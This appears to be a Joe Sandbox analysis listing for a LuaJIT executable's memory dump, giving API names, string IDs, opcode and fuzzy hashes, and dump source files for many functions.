                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_9_2_7ff738a30000_LuaJIT.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ErrorLast$FormatLibraryLoadMessage
                                                                                                                                                                        • String ID: cannot load module '%s': %s
                                                                                                                                                                        • API String ID: 3853237079-2554058836
                                                                                                                                                                        • Opcode ID: df188ce702c3eb17da8a1c255447b51e67c1ee2f39d31328e8d2608fad6f4809
                                                                                                                                                                        • Instruction ID: c306ac26bbca1ebbba1d950a35751129f617227fd3ff35e2c70e2482e64d24cb
                                                                                                                                                                        • Opcode Fuzzy Hash: df188ce702c3eb17da8a1c255447b51e67c1ee2f39d31328e8d2608fad6f4809
                                                                                                                                                                        • Instruction Fuzzy Hash: 99F01932919A8692DB10EB15F44161AF770FBC97D4F900135EA8D03B38DF3ED1549B19
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000009.00000002.1937269519.00007FF738A31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                                                                                                                                        • Associated: 00000009.00000002.1937252453.00007FF738A30000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                        • Associated: 00000009.00000002.1937462311.00007FF738B21000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                        • Associated: 00000009.00000002.1937504646.00007FF738B3F000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                        • Associated: 00000009.00000002.1937538221.00007FF738B40000.00000008.00000001.01000000.00000005.sdmp
                                                                                                                                                                        • Associated: 00000009.00000002.1937577298.00007FF738B42000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                        • Associated: 00000009.00000002.1937595379.00007FF738B45000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_9_2_7ff738a30000_LuaJIT.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: __scrt_acquire_startup_lock__scrt_dllmain_crt_thread_attach__scrt_get_show_window_mode__scrt_initialize_crt__scrt_release_startup_lock
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1452418845-0
                                                                                                                                                                        • Opcode ID: 8f06a7c1d25b1d9d4209a0557e7fbf7031a6169d9c2e25739453ee5eb69d5cde
                                                                                                                                                                        • Instruction ID: e8140d158c2c6186a5500382b26df002da6016975c310b3441428b21c63ac51c
                                                                                                                                                                        • Opcode Fuzzy Hash: 8f06a7c1d25b1d9d4209a0557e7fbf7031a6169d9c2e25739453ee5eb69d5cde
                                                                                                                                                                        • Instruction Fuzzy Hash: F0314C23E0F243B6EA14BB249421BB9D2919F41788FC45435E54D8B6D3DE3FF408A279
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000009.00000002.1937269519.00007FF738A31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                                                                                                                                        • Associated: 00000009.00000002.1937252453.00007FF738A30000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                        • Associated: 00000009.00000002.1937462311.00007FF738B21000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                        • Associated: 00000009.00000002.1937504646.00007FF738B3F000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                        • Associated: 00000009.00000002.1937538221.00007FF738B40000.00000008.00000001.01000000.00000005.sdmp
                                                                                                                                                                        • Associated: 00000009.00000002.1937577298.00007FF738B42000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                        • Associated: 00000009.00000002.1937595379.00007FF738B45000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_9_2_7ff738a30000_LuaJIT.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ErrorLast$QueryVirtual
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3696288210-0
                                                                                                                                                                        • Opcode ID: f4a39bd2c8b4e77c2adc7d5054eb46406d13928e6223299f2622db2b8216fcc4
                                                                                                                                                                        • Instruction ID: ab2575f92df627165b459ad304ccf3cd5d64acc93d7e744c3fb507dc620f3084
                                                                                                                                                                        • Opcode Fuzzy Hash: f4a39bd2c8b4e77c2adc7d5054eb46406d13928e6223299f2622db2b8216fcc4
                                                                                                                                                                        • Instruction Fuzzy Hash: BC21386361EE4991EA60AB15E44062BE7F0FB987E4F500335E6CD42BB8DF3DD5809B14
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000009.00000002.1937269519.00007FF738A31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                                                                                                                                        • Associated: 00000009.00000002.1937252453.00007FF738A30000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                        • Associated: 00000009.00000002.1937462311.00007FF738B21000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                        • Associated: 00000009.00000002.1937504646.00007FF738B3F000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                        • Associated: 00000009.00000002.1937538221.00007FF738B40000.00000008.00000001.01000000.00000005.sdmp
                                                                                                                                                                        • Associated: 00000009.00000002.1937577298.00007FF738B42000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                        • Associated: 00000009.00000002.1937595379.00007FF738B45000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_9_2_7ff738a30000_LuaJIT.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID: $
                                                                                                                                                                        • API String ID: 0-227171996
                                                                                                                                                                        • Opcode ID: 42b03ba9e73f26ef3ff5bce6f6d6021bda52361ae5da36bdbd1b7fcc2366f800
                                                                                                                                                                        • Instruction ID: ab5af5df78fd66358b489b28d845c451da8f683abf9aedfe5f3277fab792e60a
                                                                                                                                                                        • Opcode Fuzzy Hash: 42b03ba9e73f26ef3ff5bce6f6d6021bda52361ae5da36bdbd1b7fcc2366f800
                                                                                                                                                                        • Instruction Fuzzy Hash: 86021137619B8585DA709B2AD48022EF7A0F789BA4F504332EAAD877E5CF3DD4409B14
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000009.00000002.1937269519.00007FF738A31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                                                                                                                                        • Associated: 00000009.00000002.1937252453.00007FF738A30000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                        • Associated: 00000009.00000002.1937462311.00007FF738B21000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                        • Associated: 00000009.00000002.1937504646.00007FF738B3F000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                        • Associated: 00000009.00000002.1937538221.00007FF738B40000.00000008.00000001.01000000.00000005.sdmp
                                                                                                                                                                        • Associated: 00000009.00000002.1937577298.00007FF738B42000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                        • Associated: 00000009.00000002.1937595379.00007FF738B45000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_9_2_7ff738a30000_LuaJIT.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ErrorLast
                                                                                                                                                                        • String ID: I
                                                                                                                                                                        • API String ID: 1452528299-3707901625
                                                                                                                                                                        • Opcode ID: 1531ca18713afc799c8f2ef2775fe20da84f2d7cb99f84b19dd3da76f019ca22
                                                                                                                                                                        • Instruction ID: 90893d97c1b2abc744fb0a00d8a15bed1e51196b2416aed816471504f4481cfc
                                                                                                                                                                        • Opcode Fuzzy Hash: 1531ca18713afc799c8f2ef2775fe20da84f2d7cb99f84b19dd3da76f019ca22
                                                                                                                                                                        • Instruction Fuzzy Hash: 74E10A77619B8586DB60DB1AE48076AB7B0F7C8B94F500226EACD83BA4CF3DD540DB14
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000009.00000002.1937269519.00007FF738A31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                                                                                                                                        • Associated: 00000009.00000002.1937252453.00007FF738A30000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                        • Associated: 00000009.00000002.1937462311.00007FF738B21000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                        • Associated: 00000009.00000002.1937504646.00007FF738B3F000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                        • Associated: 00000009.00000002.1937538221.00007FF738B40000.00000008.00000001.01000000.00000005.sdmp
                                                                                                                                                                        • Associated: 00000009.00000002.1937577298.00007FF738B42000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                        • Associated: 00000009.00000002.1937595379.00007FF738B45000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_9_2_7ff738a30000_LuaJIT.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ErrorLast
                                                                                                                                                                        • String ID: \
                                                                                                                                                                        • API String ID: 1452528299-2967466578
                                                                                                                                                                        • Opcode ID: dc7aa63d98f7a6b8676f16d7f75754d7e493f1b49019153a7c34ee2b34105215
                                                                                                                                                                        • Instruction ID: 1867fa553cb279dd6d37d3f9d986128c04a02cb61376ac20935cb49a1fe0f9b5
                                                                                                                                                                        • Opcode Fuzzy Hash: dc7aa63d98f7a6b8676f16d7f75754d7e493f1b49019153a7c34ee2b34105215
                                                                                                                                                                        • Instruction Fuzzy Hash: 33513D33A19B8586DB50DB19E48062AF7A0F7C8BA4F940235EAAD877A4CF3DD441DF14
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000009.00000002.1937269519.00007FF738A31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                                                                                                                                        • Associated: 00000009.00000002.1937252453.00007FF738A30000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                        • Associated: 00000009.00000002.1937462311.00007FF738B21000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                        • Associated: 00000009.00000002.1937504646.00007FF738B3F000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                        • Associated: 00000009.00000002.1937538221.00007FF738B40000.00000008.00000001.01000000.00000005.sdmp
                                                                                                                                                                        • Associated: 00000009.00000002.1937577298.00007FF738B42000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                        • Associated: 00000009.00000002.1937595379.00007FF738B45000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_9_2_7ff738a30000_LuaJIT.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Process$CurrentExitTerminate
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1703294689-0
                                                                                                                                                                        • Opcode ID: 5d4d62a54e9c46130ac50dd2ca8ebd46fd0b951107292fc29c74b2f9e1b698cf
                                                                                                                                                                        • Instruction ID: dfba194f582a5268ebd122c761377787c461388ca89c85970ebc028b89d77c0b
                                                                                                                                                                        • Opcode Fuzzy Hash: 5d4d62a54e9c46130ac50dd2ca8ebd46fd0b951107292fc29c74b2f9e1b698cf
                                                                                                                                                                        • Instruction Fuzzy Hash: C7E04821B0574757EB547B615C8577DE252AF45B52F94843AC80E033A2CE3FF449932A
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000009.00000002.1937269519.00007FF738A31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                                                                                                                                        • Associated: 00000009.00000002.1937252453.00007FF738A30000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                        • Associated: 00000009.00000002.1937462311.00007FF738B21000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                        • Associated: 00000009.00000002.1937504646.00007FF738B3F000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                        • Associated: 00000009.00000002.1937538221.00007FF738B40000.00000008.00000001.01000000.00000005.sdmp
                                                                                                                                                                        • Associated: 00000009.00000002.1937577298.00007FF738B42000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                        • Associated: 00000009.00000002.1937595379.00007FF738B45000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_9_2_7ff738a30000_LuaJIT.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ErrorLast$AllocVirtual
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1225938287-0
                                                                                                                                                                        • Opcode ID: 0a31b1735084f54a03591de20996a30d0408d625ad59090563f2f3174e9d2cb5
                                                                                                                                                                        • Instruction ID: f05ee5ba4fd477b06d73d607fa342382169142b64e8154eff4a5820fc3f8fc33
                                                                                                                                                                        • Opcode Fuzzy Hash: 0a31b1735084f54a03591de20996a30d0408d625ad59090563f2f3174e9d2cb5
                                                                                                                                                                        • Instruction Fuzzy Hash: 40F01D72529B8592D720AB14E44471EF760F7887B4F400324E6ED02BE8CF3DD1448B18
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000009.00000002.1937269519.00007FF738A31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                                                                                                                                        • Associated: 00000009.00000002.1937252453.00007FF738A30000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                        • Associated: 00000009.00000002.1937462311.00007FF738B21000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                        • Associated: 00000009.00000002.1937504646.00007FF738B3F000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                        • Associated: 00000009.00000002.1937538221.00007FF738B40000.00000008.00000001.01000000.00000005.sdmp
                                                                                                                                                                        • Associated: 00000009.00000002.1937577298.00007FF738B42000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                        • Associated: 00000009.00000002.1937595379.00007FF738B45000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_9_2_7ff738a30000_LuaJIT.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ErrorLast$AllocVirtual
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1225938287-0
                                                                                                                                                                        • Opcode ID: 6f5d66f4205355a488102a5330247b632e870741214089924bbcf7827210fdc4
                                                                                                                                                                        • Instruction ID: a004824deb45ea4b453b0a45e3bb711f85ef58bdf6322ba4e0807154e5c960b0
                                                                                                                                                                        • Opcode Fuzzy Hash: 6f5d66f4205355a488102a5330247b632e870741214089924bbcf7827210fdc4
                                                                                                                                                                        • Instruction Fuzzy Hash: D1F01D72529B8596D720AB14E44471AF760F7887F4F400334E6ED02BE8CF3DD1449B18
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000009.00000002.1937269519.00007FF738A31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                                                                                                                                        • Associated: 00000009.00000002.1937252453.00007FF738A30000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                        • Associated: 00000009.00000002.1937462311.00007FF738B21000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                        • Associated: 00000009.00000002.1937504646.00007FF738B3F000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                        • Associated: 00000009.00000002.1937538221.00007FF738B40000.00000008.00000001.01000000.00000005.sdmp
                                                                                                                                                                        • Associated: 00000009.00000002.1937577298.00007FF738B42000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                        • Associated: 00000009.00000002.1937595379.00007FF738B45000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_9_2_7ff738a30000_LuaJIT.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: strrchr
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3418686817-3916222277
                                                                                                                                                                        • Opcode ID: 4e961bf43056450b91defcd618916dda4355ce4e6050535bdf05ac30be3a137a
                                                                                                                                                                        • Instruction ID: 748a450987bd9eb74bea5bd6cc36c030ff3d0ab200063deaf09b5ed84a61458e
                                                                                                                                                                        • Opcode Fuzzy Hash: 4e961bf43056450b91defcd618916dda4355ce4e6050535bdf05ac30be3a137a
                                                                                                                                                                        • Instruction Fuzzy Hash: 6D51C737619A8486DB50DB19E08072AF7B0F7C9B90F541126FB8E87B69CB39D4418F04
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000009.00000002.1937269519.00007FF738A31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                                                                                                                                        • Associated: 00000009.00000002.1937252453.00007FF738A30000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                        • Associated: 00000009.00000002.1937462311.00007FF738B21000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                        • Associated: 00000009.00000002.1937504646.00007FF738B3F000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                        • Associated: 00000009.00000002.1937538221.00007FF738B40000.00000008.00000001.01000000.00000005.sdmp
                                                                                                                                                                        • Associated: 00000009.00000002.1937577298.00007FF738B42000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                        • Associated: 00000009.00000002.1937595379.00007FF738B45000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_9_2_7ff738a30000_LuaJIT.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Info
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1807457897-3916222277
                                                                                                                                                                        • Opcode ID: d6049e12829b25a40106f2a2772facc37ef588d00b3e3406152c56e8e443654b
                                                                                                                                                                        • Instruction ID: 5e31cc5de46b70ded0726bdbc3d7f7313b4fc345a8a4b559957c1ea29c747bc3
                                                                                                                                                                        • Opcode Fuzzy Hash: d6049e12829b25a40106f2a2772facc37ef588d00b3e3406152c56e8e443654b
                                                                                                                                                                        • Instruction Fuzzy Hash: AA51043391C2C296E7209F24D0443EEFBA1F749B48F944135EA8E4BA89CB3DD405DBA5
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000009.00000002.1937269519.00007FF738A31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                                                                                                                                        • Associated: 00000009.00000002.1937252453.00007FF738A30000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                        • Associated: 00000009.00000002.1937462311.00007FF738B21000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                        • Associated: 00000009.00000002.1937504646.00007FF738B3F000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                        • Associated: 00000009.00000002.1937538221.00007FF738B40000.00000008.00000001.01000000.00000005.sdmp
                                                                                                                                                                        • Associated: 00000009.00000002.1937577298.00007FF738B42000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                        • Associated: 00000009.00000002.1937595379.00007FF738B45000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_9_2_7ff738a30000_LuaJIT.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: _wcsupr_s
                                                                                                                                                                        • String ID: arg
                                                                                                                                                                        • API String ID: 600324503-2022414218
                                                                                                                                                                        • Opcode ID: 35be564464d6c4820efd0d8c7376e547ad19c939cfcdb2e341138f1cc7ef3ed0
                                                                                                                                                                        • Instruction ID: b4c1afa143b4fce1ca14a56ed0419847d4ae7d57b9ebc7412877934d019faf0e
                                                                                                                                                                        • Opcode Fuzzy Hash: 35be564464d6c4820efd0d8c7376e547ad19c939cfcdb2e341138f1cc7ef3ed0
                                                                                                                                                                        • Instruction Fuzzy Hash: B331733260964197D620EB29E44162AF3A0FBC9794F900231FA8D877A9DF7FD9019F14
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 00007FF738B163F0: GetOEMCP.KERNEL32(?,?,?,?,?,?,FFFFFFFD,00007FF738B16714,?,?,?,?,00000000,COMSPEC,?,00007FF738B169AE), ref: 00007FF738B1641A
                                                                                                                                                                        • IsValidCodePage.KERNEL32(?,00000001,?,?,00000000,00000001,?,00007FF738B167C7,?,?,?,?,00000000,COMSPEC,?,00007FF738B169AE), ref: 00007FF738B16A43
                                                                                                                                                                        • GetCPInfo.KERNEL32(?,00000001,?,?,00000000,00000001,?,00007FF738B167C7,?,?,?,?,00000000,COMSPEC,?,00007FF738B169AE), ref: 00007FF738B16A8F
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000009.00000002.1937269519.00007FF738A31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                                                                                                                                        • Associated: 00000009.00000002.1937252453.00007FF738A30000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                        • Associated: 00000009.00000002.1937462311.00007FF738B21000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                        • Associated: 00000009.00000002.1937504646.00007FF738B3F000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                        • Associated: 00000009.00000002.1937538221.00007FF738B40000.00000008.00000001.01000000.00000005.sdmp
                                                                                                                                                                        • Associated: 00000009.00000002.1937577298.00007FF738B42000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                        • Associated: 00000009.00000002.1937595379.00007FF738B45000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_9_2_7ff738a30000_LuaJIT.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: CodeInfoPageValid
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 546120528-0
                                                                                                                                                                        • Opcode ID: 8c69a90c0386b87ed3e1871073eaed1069123791459b7e64fa7c6bddaab46548
                                                                                                                                                                        • Instruction ID: b9965d9984b12bffd05f67e5aa2f25eaae5d2f1f2ae9960843bd55e5abbb4996
                                                                                                                                                                        • Opcode Fuzzy Hash: 8c69a90c0386b87ed3e1871073eaed1069123791459b7e64fa7c6bddaab46548
                                                                                                                                                                        • Instruction Fuzzy Hash: 0E811763F0C68365F765AF25D44117AF6A2EB12740FC44036D68E0B690DE3FF545A32A
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000009.00000002.1937269519.00007FF738A31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                                                                                                                                        • Associated: 00000009.00000002.1937252453.00007FF738A30000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                        • Associated: 00000009.00000002.1937462311.00007FF738B21000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                        • Associated: 00000009.00000002.1937504646.00007FF738B3F000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                        • Associated: 00000009.00000002.1937538221.00007FF738B40000.00000008.00000001.01000000.00000005.sdmp
                                                                                                                                                                        • Associated: 00000009.00000002.1937577298.00007FF738B42000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                        • Associated: 00000009.00000002.1937595379.00007FF738B45000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_9_2_7ff738a30000_LuaJIT.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: _invalid_parameter_noinfo
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3215553584-0
                                                                                                                                                                        • Opcode ID: 23f93f3439cf481d68ace413158a8b6a052188d27ba90543d8d527b73a2b783b
                                                                                                                                                                        • Instruction ID: 5a9529750e977e6515c00f99ebbbfb1ac99c2fc5be1a330e7be234bc95560ab3
                                                                                                                                                                        • Opcode Fuzzy Hash: 23f93f3439cf481d68ace413158a8b6a052188d27ba90543d8d527b73a2b783b
                                                                                                                                                                        • Instruction Fuzzy Hash: 4C51BC33B0B15255F664BE259C00E7AE6E1BB44BA4F944332DD6C477D5CF3EE402A628
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000009.00000002.1937269519.00007FF738A31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                                                                                                                                        • Associated: 00000009.00000002.1937252453.00007FF738A30000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                        • Associated: 00000009.00000002.1937462311.00007FF738B21000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                        • Associated: 00000009.00000002.1937504646.00007FF738B3F000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                        • Associated: 00000009.00000002.1937538221.00007FF738B40000.00000008.00000001.01000000.00000005.sdmp
                                                                                                                                                                        • Associated: 00000009.00000002.1937577298.00007FF738B42000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                        • Associated: 00000009.00000002.1937595379.00007FF738B45000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_9_2_7ff738a30000_LuaJIT.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Initialize_invalid_parameter_noinfo_set_fmode
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3548387204-0
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • FindCloseChangeNotification.KERNEL32(?,?,?,00007FF738B0D50B,?,?,00000000,00007FF738B0D5B3,?,?,?,?,?,?,00007FF738AFAF6A), ref: 00007FF738B0D63E
                                                                                                                                                                        • GetLastError.KERNEL32(?,?,?,00007FF738B0D50B,?,?,00000000,00007FF738B0D5B3,?,?,?,?,?,?,00007FF738AFAF6A), ref: 00007FF738B0D648
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000009.00000002.1937269519.00007FF738A31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_9_2_7ff738a30000_LuaJIT.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ChangeCloseErrorFindLastNotification
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1687624791-0
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • SetFilePointerEx.KERNEL32(?,?,?,00007FF738B0CE7B,?,?,?,?,?,?,?,?,FFFFFFFE,?,?,00007FF738B0CDA3), ref: 00007FF738B106C8
                                                                                                                                                                        • GetLastError.KERNEL32(?,?,?,00007FF738B0CE7B,?,?,?,?,?,?,?,?,FFFFFFFE,?,?,00007FF738B0CDA3), ref: 00007FF738B106D2
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000009.00000002.1937269519.00007FF738A31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF738A30000, based on PE: true
